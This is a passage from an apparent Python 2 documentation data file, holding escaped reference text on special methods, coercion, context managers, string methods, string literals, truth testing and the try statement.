other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n\n\nCoercion rules\n==============\n\nThis section used to document the rules for coercion. As the language\nhas evolved, the coercion rules have become hard to document\nprecisely; documenting what one version of one particular\nimplementation does is undesirable. Instead, here are some informal\nguidelines regarding coercion. In Python 3, coercion will not be\nsupported.\n\n* If the left operand of a % operator is a string or Unicode object,\n no coercion takes place and the string formatting operation is\n invoked instead.\n\n* It is no longer recommended to define a coercion operation. Mixed-\n mode operations on types that don\'t define coercion pass the\n original arguments to the operation.\n\n* New-style classes (those derived from "object") never invoke the\n "__coerce__()" method in response to a binary operator; the only\n time "__coerce__()" is invoked is when the built-in function\n "coerce()" is called.\n\n* For most intents and purposes, an operator that returns\n "NotImplemented" is treated the same as one that is not implemented\n at all.\n\n* Below, "__op__()" and "__rop__()" are used to signify the generic\n method names corresponding to an operator; "__iop__()" is used for\n the corresponding in-place operator. For example, for the operator\n \'"+"\', "__add__()" and "__radd__()" are used for the left and right\n variant of the binary operator, and "__iadd__()" for the in-place\n variant.\n\n* For objects *x* and *y*, first "x.__op__(y)" is tried. If this is\n not implemented or returns "NotImplemented", "y.__rop__(x)" is\n tried. If this is also not implemented or returns "NotImplemented",\n a "TypeError" exception is raised. But see the following exception:\n\n* Exception to the previous item: if the left operand is an instance\n of a built-in type or a new-style class, and the right operand is an\n instance of a proper subclass of that type or class and overrides\n the base\'s "__rop__()" method, the right operand\'s "__rop__()"\n method is tried *before* the left operand\'s "__op__()" method.\n\n This is done so that a subclass can completely override binary\n operators. Otherwise, the left operand\'s "__op__()" method would\n always accept the right operand: when an instance of a given class\n is expected, an instance of a subclass of that class is always\n acceptable.\n\n* When either operand type defines a coercion, this coercion is\n called before that type\'s "__op__()" or "__rop__()" method is\n called, but no sooner. If the coercion returns an object of a\n different type for the operand whose coercion is invoked, part of\n the process is redone using the new object.\n\n* When an in-place operator (like \'"+="\') is used, if the left\n operand implements "__iop__()", it is invoked without any coercion.\n When the operation falls back to "__op__()" and/or "__rop__()", the\n normal coercion rules apply.\n\n* In "x + y", if *x* is a sequence that implements sequence\n concatenation, sequence concatenation is invoked.\n\n* In "x * y", if one operand is a sequence that implements sequence\n repetition, and the other is an integer ("int" or "long"), sequence\n repetition is invoked.\n\n* Rich comparisons (implemented by methods "__eq__()" and so on)\n never use coercion. Three-way comparison (implemented by\n "__cmp__()") does use coercion under the same conditions as other\n binary operations use it.\n\n* In the current implementation, the built-in numeric types "int",\n "long", "float", and "complex" do not use coercion. All these types\n implement a "__coerce__()" method, for use by the built-in\n "coerce()" function.\n\n Changed in version 2.7: The complex type no longer makes implicit\n calls to the "__coerce__()" method for mixed-type binary arithmetic\n operations.\n\n\nWith Statement Context Managers\n===============================\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nSpecial method lookup for old-style classes\n===========================================\n\nFor old-style classes, special methods are always looked up in exactly\nthe same way as any other method or attribute. This is the case\nregardless of whether the method is being looked up explicitly as in\n"x.__getitem__(i)" or implicitly as in "x[i]".\n\nThis behaviour means that special methods may exhibit different\nbehaviour for different instances of a single old-style class if the\nappropriate special attributes are set differently:\n\n >>> class C:\n ... pass\n ...\n >>> c1 = C()\n >>> c2 = C()\n >>> c1.__len__ = lambda: 5\n >>> c2.__len__ = lambda: 9\n >>> len(c1)\n 5\n >>> len(c2)\n 9\n\n\nSpecial method lookup for new-style classes\n===========================================\n\nFor new-style classes, implicit invocations of special methods are\nonly guaranteed to work correctly if defined on an object\'s type, not\nin the object\'s instance dictionary. That behaviour is the reason why\nthe following code raises an exception (unlike the equivalent example\nwith old-style classes):\n\n >>> class C(object):\n ... pass\n ...\n >>> c = C()\n >>> c.__len__ = lambda: 5\n >>> len(c)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: object of type \'C\' has no len()\n\nThe rationale behind this behaviour lies with a number of special\nmethods such as "__hash__()" and "__repr__()" that are implemented by\nall objects, including type objects. If the implicit lookup of these\nmethods used the conventional lookup process, they would fail when\ninvoked on the type object itself:\n\n >>> 1 .__hash__() == hash(1)\n True\n >>> int.__hash__() == hash(int)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: descriptor \'__hash__\' of \'int\' object needs an argument\n\nIncorrectly attempting to invoke an unbound method of a class in this\nway is sometimes referred to as \'metaclass confusion\', and is avoided\nby bypassing the instance when looking up special methods:\n\n >>> type(1).__hash__(1) == hash(1)\n True\n >>> type(int).__hash__(int) == hash(int)\n True\n\nIn addition to bypassing any instance attributes in the interest of\ncorrectness, implicit special method lookup generally also bypasses\nthe "__getattribute__()" method even of the object\'s metaclass:\n\n >>> class Meta(type):\n ... def __getattribute__(*args):\n ... print "Metaclass getattribute invoked"\n ... return type.__getattribute__(*args)\n ...\n >>> class C(object):\n ... __metaclass__ = Meta\n ... def __len__(self):\n ... return 10\n ... def __getattribute__(*args):\n ... print "Class getattribute invoked"\n ... return object.__getattribute__(*args)\n ...\n >>> c = C()\n >>> c.__len__() # Explicit lookup via instance\n Class getattribute invoked\n 10\n >>> type(c).__len__(c) # Explicit lookup via type\n Metaclass getattribute invoked\n 10\n >>> len(c) # Implicit lookup\n 10\n\nBypassing the "__getattribute__()" machinery in this fashion provides\nsignificant scope for speed optimisations within the interpreter, at\nthe cost of some flexibility in the handling of special methods (the\nspecial method *must* be set on the class object itself in order to be\nconsistently invoked by the interpreter).\n\n-[ Footnotes ]-\n\n[1] It *is* possible in some cases to change an object\'s type,\n under certain controlled conditions. It generally isn\'t a good\n idea though, since it can lead to some very strange behaviour if\n it is handled incorrectly.\n\n[2] For operands of the same type, it is assumed that if the non-\n reflected method (such as "__add__()") fails the operation is not\n supported, which is why the reflected method is not called.\n', 'string-methods': u'\nString Methods\n**************\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return centered in a string of length *width*. Padding is done\n using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01 012 0123 01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01 012 0123 01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \'The sum of 1 + 2 is 3\'\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n *iterable* *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.lstrip()\n \'spacious \'\n >>> \'www.example.com\'.lstrip(\'cmowz.\')\n \'example.com\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.rstrip()\n \' spacious\'\n >>> \'mississippi\'.rstrip(\'ipz\')\n \'mississ\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The *sep* argument\n may consist of multiple characters (for example,\n "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). Splitting an\n empty string with a specified separator returns "[\'\']".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\' 1 2 3 \'.split()" returns "[\'1\', \'2\', \'3\']", and\n "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 \']".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n c\', \'\', \'de fg\', \'kl\']", while the same call with\n "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de fg\\r\', \'kl\\r\\n\']".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \' spacious \'.strip()\n \'spacious\'\n >>> \'www.example.com\'.strip(\'cmowz.\')\n \'example\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\'re bill\'s friends from the UK".title()\n "They\'Re Bill\'S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\'re bill\'s friends.")\n "They\'re Bill\'s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \'read this short text\'.translate(None, \'aeiou\')\n \'rd ths shrt txt\'\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of the\n *s* where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module (see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n', 'strings': u'\nString literals\n***************\n\nString literals are described by the following lexical definitions:\n\n stringliteral ::= [stringprefix](shortstring | longstring)\n stringprefix ::= "r" | "u" | "ur" | "R" | "U" | "UR" | "Ur" | "uR"\n | "b" | "B" | "br" | "Br" | "bR" | "BR"\n shortstring ::= "\'" shortstringitem* "\'" | \'"\' shortstringitem* \'"\'\n longstring ::= "\'\'\'" longstringitem* "\'\'\'"\n | \'"""\' longstringitem* \'"""\'\n shortstringitem ::= shortstringchar | escapeseq\n longstringitem ::= longstringchar | escapeseq\n shortstringchar ::= <any source character except "\\" or newline or the quote>\n longstringchar ::= <any source character except "\\">\n escapeseq ::= "\\" <any ASCII character>\n\nOne syntactic restriction not indicated by these productions is that\nwhitespace is not allowed between the "stringprefix" and the rest of\nthe string literal. The source character set is defined by the\nencoding declaration; it is ASCII if no encoding declaration is given\nin the source file; see section Encoding declarations.\n\nIn plain English: String literals can be enclosed in matching single\nquotes ("\'") or double quotes ("""). They can also be enclosed in\nmatching groups of three single or double quotes (these are generally\nreferred to as *triple-quoted strings*). The backslash ("\\")\ncharacter is used to escape characters that otherwise have a special\nmeaning, such as newline, backslash itself, or the quote character.\nString literals may optionally be prefixed with a letter "\'r\'" or\n"\'R\'"; such strings are called *raw strings* and use different rules\nfor interpreting backslash escape sequences. A prefix of "\'u\'" or\n"\'U\'" makes the string a Unicode string. Unicode strings use the\nUnicode character set as defined by the Unicode Consortium and ISO\n10646. Some additional escape sequences, described below, are\navailable in Unicode strings. A prefix of "\'b\'" or "\'B\'" is ignored in\nPython 2; it indicates that the literal should become a bytes literal\nin Python 3 (e.g. when code is automatically converted with 2to3). A\n"\'u\'" or "\'b\'" prefix may be followed by an "\'r\'" prefix.\n\nIn triple-quoted strings, unescaped newlines and quotes are allowed\n(and are retained), except that three unescaped quotes in a row\nterminate the string. (A "quote" is the character used to open the\nstring, i.e. either "\'" or """.)\n\nUnless an "\'r\'" or "\'R\'" prefix is present, escape sequences in\nstrings are interpreted according to rules similar to those used by\nStandard C. The recognized escape sequences are:\n\n+-------------------+-----------------------------------+---------+\n| Escape Sequence | Meaning | Notes |\n+===================+===================================+=========+\n| "\\newline" | Ignored | |\n+-------------------+-----------------------------------+---------+\n| "\\\\" | Backslash ("\\") | |\n+-------------------+-----------------------------------+---------+\n| "\\\'" | Single quote ("\'") | |\n+-------------------+-----------------------------------+---------+\n| "\\"" | Double quote (""") | |\n+-------------------+-----------------------------------+---------+\n| "\\a" | ASCII Bell (BEL) | |\n+-------------------+-----------------------------------+---------+\n| "\\b" | ASCII Backspace (BS) | |\n+-------------------+-----------------------------------+---------+\n| "\\f" | ASCII Formfeed (FF) | |\n+-------------------+-----------------------------------+---------+\n| "\\n" | ASCII Linefeed (LF) | |\n+-------------------+-----------------------------------+---------+\n| "\\N{name}" | Character named *name* in the | |\n| | Unicode database (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\r" | ASCII Carriage Return (CR) | |\n+-------------------+-----------------------------------+---------+\n| "\\t" | ASCII Horizontal Tab (TAB) | |\n+-------------------+-----------------------------------+---------+\n| "\\uxxxx" | Character with 16-bit hex value | (1) |\n| | *xxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\Uxxxxxxxx" | Character with 32-bit hex value | (2) |\n| | *xxxxxxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\v" | ASCII Vertical Tab (VT) | |\n+-------------------+-----------------------------------+---------+\n| "\\ooo" | Character with octal value *ooo* | (3,5) |\n+-------------------+-----------------------------------+---------+\n| "\\xhh" | Character with hex value *hh* | (4,5) |\n+-------------------+-----------------------------------+---------+\n\nNotes:\n\n1. Individual code units which form parts of a surrogate pair can\n be encoded using this escape sequence.\n\n2. Any Unicode character can be encoded this way, but characters\n outside the Basic Multilingual Plane (BMP) will be encoded using a\n surrogate pair if Python is compiled to use 16-bit code units (the\n default).\n\n3. As in Standard C, up to three octal digits are accepted.\n\n4. Unlike in Standard C, exactly two hex digits are required.\n\n5. In a string literal, hexadecimal and octal escapes denote the\n byte with the given value; it is not necessary that the byte\n encodes a character in the source character set. In a Unicode\n literal, these escapes denote a Unicode character with the given\n value.\n\nUnlike Standard C, all unrecognized escape sequences are left in the\nstring unchanged, i.e., *the backslash is left in the string*. (This\nbehavior is useful when debugging: if an escape sequence is mistyped,\nthe resulting output is more easily recognized as broken.) It is also\nimportant to note that the escape sequences marked as "(Unicode only)"\nin the table above fall into the category of unrecognized escapes for\nnon-Unicode string literals.\n\nWhen an "\'r\'" or "\'R\'" prefix is present, a character following a\nbackslash is included in the string without change, and *all\nbackslashes are left in the string*. For example, the string literal\n"r"\\n"" consists of two characters: a backslash and a lowercase "\'n\'".\nString quotes can be escaped with a backslash, but the backslash\nremains in the string; for example, "r"\\""" is a valid string literal\nconsisting of two characters: a backslash and a double quote; "r"\\""\nis not a valid string literal (even a raw string cannot end in an odd\nnumber of backslashes). Specifically, *a raw string cannot end in a\nsingle backslash* (since the backslash would escape the following\nquote character). Note also that a single backslash followed by a\nnewline is interpreted as those two characters as part of the string,\n*not* as a line continuation.\n\nWhen an "\'r\'" or "\'R\'" prefix is used in conjunction with a "\'u\'" or\n"\'U\'" prefix, then the "\\uXXXX" and "\\UXXXXXXXX" escape sequences are\nprocessed while *all other backslashes are left in the string*. For\nexample, the string literal "ur"\\u0062\\n"" consists of three Unicode\ncharacters: \'LATIN SMALL LETTER B\', \'REVERSE SOLIDUS\', and \'LATIN\nSMALL LETTER N\'. Backslashes can be escaped with a preceding\nbackslash; however, both remain in the string. As a result, "\\uXXXX"\nescape sequences are only recognized when there are an odd number of\nbackslashes.\n', 'subscriptions': u'\nSubscriptions\n*************\n\nA subscription selects an item of a sequence (string, tuple or list)\nor mapping (dictionary) object:\n\n subscription ::= primary "[" expression_list "]"\n\nThe primary must evaluate to an object of a sequence or mapping type.\n\nIf the primary is a mapping, the expression list must evaluate to an\nobject whose value is one of the keys of the mapping, and the\nsubscription selects the value in the mapping that corresponds to that\nkey. (The expression list is a tuple except if it has exactly one\nitem.)\n\nIf the primary is a sequence, the expression (list) must evaluate to a\nplain integer. If this value is negative, the length of the sequence\nis added to it (so that, e.g., "x[-1]" selects the last item of "x".)\nThe resulting value must be a nonnegative integer less than the number\nof items in the sequence, and the subscription selects the item whose\nindex is that value (counting from zero).\n\nA string\'s items are characters. A character is not a separate data\ntype but a string of exactly one character.\n', 'truth': u'\nTruth Value Testing\n*******************\n\nAny object can be tested for truth value, for use in an "if" or\n"while" condition or as operand of the Boolean operations below. The\nfollowing values are considered false:\n\n* "None"\n\n* "False"\n\n* zero of any numeric type, for example, "0", "0L", "0.0", "0j".\n\n* any empty sequence, for example, "\'\'", "()", "[]".\n\n* any empty mapping, for example, "{}".\n\n* instances of user-defined classes, if the class defines a\n "__nonzero__()" or "__len__()" method, when that method returns the\n integer zero or "bool" value "False". [1]\n\nAll other values are considered true --- so objects of many types are\nalways true.\n\nOperations and built-in functions that have a Boolean result always\nreturn "0" or "False" for false and "1" or "True" for true, unless\notherwise stated. (Important exception: the Boolean operations "or"\nand "and" always return one of their operands.)\n', 'try': u'\nThe "try" statement\n*******************\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of 